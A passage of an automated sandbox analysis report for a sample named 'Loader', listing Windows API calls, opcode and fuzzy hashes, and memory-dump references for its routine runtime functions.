                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1248733679-0
                                                                                                  • Opcode ID: fd39bb37a196d778274e4df4a7ca8801eaf5b7d55168919b416c7cd63dfc534a
                                                                                                  • Instruction ID: 3c363a684ed2e042206cb384f71b7b3253663c47ef31ec0be7559d27a447243e
                                                                                                  • Opcode Fuzzy Hash: fd39bb37a196d778274e4df4a7ca8801eaf5b7d55168919b416c7cd63dfc534a
                                                                                                  • Instruction Fuzzy Hash: 7D11A375B001047BDB04BBA4DC06EFE7BB4EB54711F04442AF605A72C2EA75595187D1
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00A98E38,0000000C), ref: 00A75483
                                                                                                  • ExitThread.KERNEL32 ref: 00A7548A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611280651-0
                                                                                                  • Opcode ID: f64505a94a85314c4314d76b5032160efe90168e4d0a5d56d088f573c2488a58
                                                                                                  • Instruction ID: bf2b4aa73a83b4d0a5e289526037f9a753a63b73e1a2a33b4a2a6a1107d11fd4
                                                                                                  • Opcode Fuzzy Hash: f64505a94a85314c4314d76b5032160efe90168e4d0a5d56d088f573c2488a58
                                                                                                  • Instruction Fuzzy Hash: F9F0C271A00604AFDB10AFB0CD1AA6E3B70FF00751F10C55AF0099B292CF745D42CB50
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00A62288
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00A6229C
                                                                                                    • Part of subcall function 00A61FB0: CreateFileA.KERNELBASE ref: 00A62036
                                                                                                    • Part of subcall function 00A61FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00A62046
                                                                                                    • Part of subcall function 00A61FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00A6206B
                                                                                                    • Part of subcall function 00A61FB0: CloseHandle.KERNELBASE(00000000), ref: 00A6207A
                                                                                                    • Part of subcall function 00A61FB0: _strlen.LIBCMT ref: 00A620CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3505371420-0
                                                                                                  • Opcode ID: 3232591d2f4abb42c7b6aba16d7b1f7621fd2647b164adf7bab25c2edc17b585
                                                                                                  • Instruction ID: 9de13230fc644c5f01b6f33ecbb85bdf6f9677316357738fbeae8da949c57175
                                                                                                  • Opcode Fuzzy Hash: 3232591d2f4abb42c7b6aba16d7b1f7621fd2647b164adf7bab25c2edc17b585
                                                                                                  • Instruction Fuzzy Hash: 3BF0EDB1A002102BD221A764BD4BEAF7BBCDF99711F004919F6895A281EE7421568AA3
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00A802B4,?,00000000,?,?,00A7FF54,?,00000007,?,?,00A8089A,?,?), ref: 00A7BEED
                                                                                                  • GetLastError.KERNEL32(?,?,00A802B4,?,00000000,?,?,00A7FF54,?,00000007,?,?,00A8089A,?,?), ref: 00A7BEF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 485612231-0
                                                                                                  • Opcode ID: 9b778245aac8560049512f855b52f43dce577d5488ea33f1284d01ebcada27d6
                                                                                                  • Instruction ID: a597b3f3409c6ca21afc0b80d720ee4c84254863d1c1183a963f2b434fceb919
                                                                                                  • Opcode Fuzzy Hash: 9b778245aac8560049512f855b52f43dce577d5488ea33f1284d01ebcada27d6
                                                                                                  • Instruction Fuzzy Hash: 5DE08C72204614ABCB116FF4AC48B993BA8EF40791F10C022F61C9A170CF308C51CBA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ddb837bb8487b266703312ef1bab2e28769fcb34c79d855f4488c71429ea386
                                                                                                  • Instruction ID: 5427989405e5ec7729b86dca6abbc450a3a6983ffaaf9ffbd34ff3321c7d879d
                                                                                                  • Opcode Fuzzy Hash: 4ddb837bb8487b266703312ef1bab2e28769fcb34c79d855f4488c71429ea386
                                                                                                  • Instruction Fuzzy Hash: AC41A335A0011AAFCB14DFA8C9948EDB7F9FF18354F64406AE442E7640EB31F945DB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 14f6ae21962e8b456b491bc932fc39caded2615c317c55881fdda50fb9767fb4
                                                                                                  • Instruction ID: 315eaa32b87ad9ff6ff46c1c2d81ef9a6de92b249af0bf37c4cd006904f622ba
                                                                                                  • Opcode Fuzzy Hash: 14f6ae21962e8b456b491bc932fc39caded2615c317c55881fdda50fb9767fb4
                                                                                                  • Instruction Fuzzy Hash: DE318472A0051AAFCB14DF68D9909FEB7B8FF09330B14426AE556E7690E731F944CB90
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A6AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00A68A2A,?,?,00A6AF87,00A68A2A,?,00A6AF58,00A68A2A,?,?,?), ref: 00A6AFD0
                                                                                                  • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,A877E463,?,?,?,Function_0002BE94,000000FF), ref: 00A6B0C7
                                                                                                    • Part of subcall function 00A6AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 00A6AF1B
                                                                                                    • Part of subcall function 00A6EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00A68E4A,00A6A2F0), ref: 00A6EFE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3627539351-0
                                                                                                  • Opcode ID: 09a41a640706a1454e156a539a00d7484fbd27eeae272f9d364bc340f05a932f
                                                                                                  • Instruction ID: d27f89406dd5104146a8bf1d6504fe53403d37400adb54cb348c7b0ca0a55faf
                                                                                                  • Opcode Fuzzy Hash: 09a41a640706a1454e156a539a00d7484fbd27eeae272f9d364bc340f05a932f
                                                                                                  • Instruction Fuzzy Hash: 4111C432744A11ABCB25ABA59E11A2E7BB5EF51B30F00441BF512D77D1CF35E841CE61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09990477f30ff6ff3373430973f0316b9294e9ccb194ef80c5132be7722d00f0
                                                                                                  • Instruction ID: 00bd113e2d2c4225cbba4ba083a650176db20fbf63ca19f740d63a21f67dd8b6
                                                                                                  • Opcode Fuzzy Hash: 09990477f30ff6ff3373430973f0316b9294e9ccb194ef80c5132be7722d00f0
                                                                                                  • Instruction Fuzzy Hash: 2A0192333102156B9B16CFA8ED41D56337ABFC0760B25D526FA1A9B194DF31D90396A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalLeaveSection
                                                                                                  • String ID:
                                                                                                  • API String ID: 3988221542-0
                                                                                                  • Opcode ID: e4f173b6de10c910f50d2da8cefaa9ef3d470a802abc8e93a3561a132d7fd20b
                                                                                                  • Instruction ID: c248cfa9ce848bc1701905321d29a1d9d2535d0988bc4d1fb280c2cdc42e21e2
                                                                                                  • Opcode Fuzzy Hash: e4f173b6de10c910f50d2da8cefaa9ef3d470a802abc8e93a3561a132d7fd20b
                                                                                                  • Instruction Fuzzy Hash: 120144767082865ECF159B38F9296B9BB30FF95334B20816FD0A5894C1CB135820C700
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Release_chore.LIBCPMT ref: 00A677C6
                                                                                                    • Part of subcall function 00A6AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,00A678DA,00000000), ref: 00A6AF72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                  • String ID:
                                                                                                  • API String ID: 312417170-0
                                                                                                  • Opcode ID: 7986d1aeb732ed587157d9114c4ddc6f75b42916034b3c98a1723022d2d398e8
                                                                                                  • Instruction ID: b01430884eabf83aad2c986575c40ccdc020129823beb06b7493ce384a6fbb43
                                                                                                  • Opcode Fuzzy Hash: 7986d1aeb732ed587157d9114c4ddc6f75b42916034b3c98a1723022d2d398e8
                                                                                                  • Instruction Fuzzy Hash: BE0128B1C006599BDB00EF94D94579EBBB4FB44720F00423AE81967350E379AA45CAD2
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00A7DF35,?,?,00A7DF35,00000220,?,00000000,?), ref: 00A7BF43
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 4eba9906e3d719bf8cbf0dac8971599a870b310d5be6fe0e42c37030cbe750e5
                                                                                                  • Instruction ID: a90321b005ce842c30f7a7b00c93a73335c2b4f12fef74a4cf85a6ae3ceeabd5
                                                                                                  • Opcode Fuzzy Hash: 4eba9906e3d719bf8cbf0dac8971599a870b310d5be6fe0e42c37030cbe750e5
                                                                                                  • Instruction Fuzzy Hash: D1E06DB126662167DB216BA69D04B9E3A5CAF41FA0F15C161FC2D961D0DF60DC00D9B1
                                                                                                  APIs
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00A6990F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                  • String ID:
                                                                                                  • API String ID: 118556049-0
                                                                                                  • Opcode ID: c36b69a8fe21c4fee9501f37152689ecb08cb6c96988a2c613a2ae8d8f79fb63
                                                                                                  • Instruction ID: a936ecc5425d730dfc12ed88d49e0d03e84e86661cec220357ad195c585d9b9d
                                                                                                  • Opcode Fuzzy Hash: c36b69a8fe21c4fee9501f37152689ecb08cb6c96988a2c613a2ae8d8f79fb63
                                                                                                  • Instruction Fuzzy Hash: D6D0A73A7110244F4B15BB68B91486E73A5FFC8B20356046EE851D7355CB34DC4287D0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 85faf14597102a3bcf8e0708950fae12390d2f67da74999cfaf2ce40f067817c
                                                                                                  • Instruction ID: 4b6584185de7520e20840a2c5b86389531394153c03ff56da80aaab22dc7aa3c
                                                                                                  • Opcode Fuzzy Hash: 85faf14597102a3bcf8e0708950fae12390d2f67da74999cfaf2ce40f067817c
                                                                                                  • Instruction Fuzzy Hash: 85D22672E082298FDB65DF28CD44BEAB7B5EB44344F5441EAD40DE7240EB78AE858F41
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AA0
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AC9
                                                                                                  • GetACP.KERNEL32(?,?,00A813BD,?,00000000), ref: 00A81ADE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
                                                                                                  • Instruction ID: f3a3c339105a04fc864aaafe16e605ec371b9e0530cff40077efbe93b58ca208
                                                                                                  • Opcode Fuzzy Hash: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
                                                                                                  • Instruction Fuzzy Hash: E7218672B02100AAEB3DEF64C901A97F3AEEF54FD4B968465E90AD7104E732DD42C350
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00A8138F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00A813CD
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00A813E0
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A81428
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A81443
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: bc4839cbcc899dd5e7d3c48f4c4daf35d37c579f20b195abf4c5100e8d264a98
                                                                                                  • Instruction ID: 75313aa3c67ed755d0fa03882aff39850491ab4a549f03f296c0b854ce07372f
                                                                                                  • Opcode Fuzzy Hash: bc4839cbcc899dd5e7d3c48f4c4daf35d37c579f20b195abf4c5100e8d264a98
                                                                                                  • Instruction Fuzzy Hash: 84516CB1A00219ABEB20EFA5DD45EBE77BCFF05740F544429F915EB190EB709A428B60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
